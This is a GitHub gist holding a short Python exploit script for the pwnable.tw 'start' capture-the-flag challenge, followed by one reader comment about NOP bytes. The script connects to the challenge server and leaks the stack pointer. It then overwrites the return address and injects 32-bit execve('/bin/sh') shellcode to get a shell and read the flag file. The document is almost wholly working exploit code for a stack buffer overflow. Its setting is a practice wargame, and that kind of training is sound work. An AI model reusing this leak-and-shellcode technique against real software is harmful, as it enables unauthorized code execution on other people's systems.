Created
January 8, 2018 12:21
-
-
Save giuscri/b164af0f4128cd8bc1a8d2b74707cea1 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from struct import pack, unpack | |
| from binascii import unhexlify | |
| # Got it via `ragg2 -i exec -b 32` | |
| shellcode = unhexlify('31c050682f2f7368682f62696e89e3505389e199b00b31d2cd80') | |
| sck = socket.create_connection(('chall.pwnable.tw', 10000)) | |
| #sck = socket.create_connection(('0.0.0.0', 8080)) | |
| _ = sck.recv(4096) | |
| sck.send(b'\x90' * 20 + pack('<I', 0x08048087)) | |
| esp, = unpack('<I', sck.recv(4096)[:4]) | |
| print(f"*** Leaked esp={hex(esp)}") | |
| print(f"*** Setting retaddr={hex(esp+20)}") | |
| payload = pack('<I', esp+20) * 6 + shellcode | |
| assert len(payload) <= 60, "You can't inject more than 60-bytes." | |
| sck.send(payload) | |
| sck.send(b'cat /home/start/flag\n') | |
| print(sck.recv(4096).decode(), end='') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
For anyone else wondering, \x90 is
NOP... Multiplying it by 20 does not multiply value... Instead, it repeats it 20 times...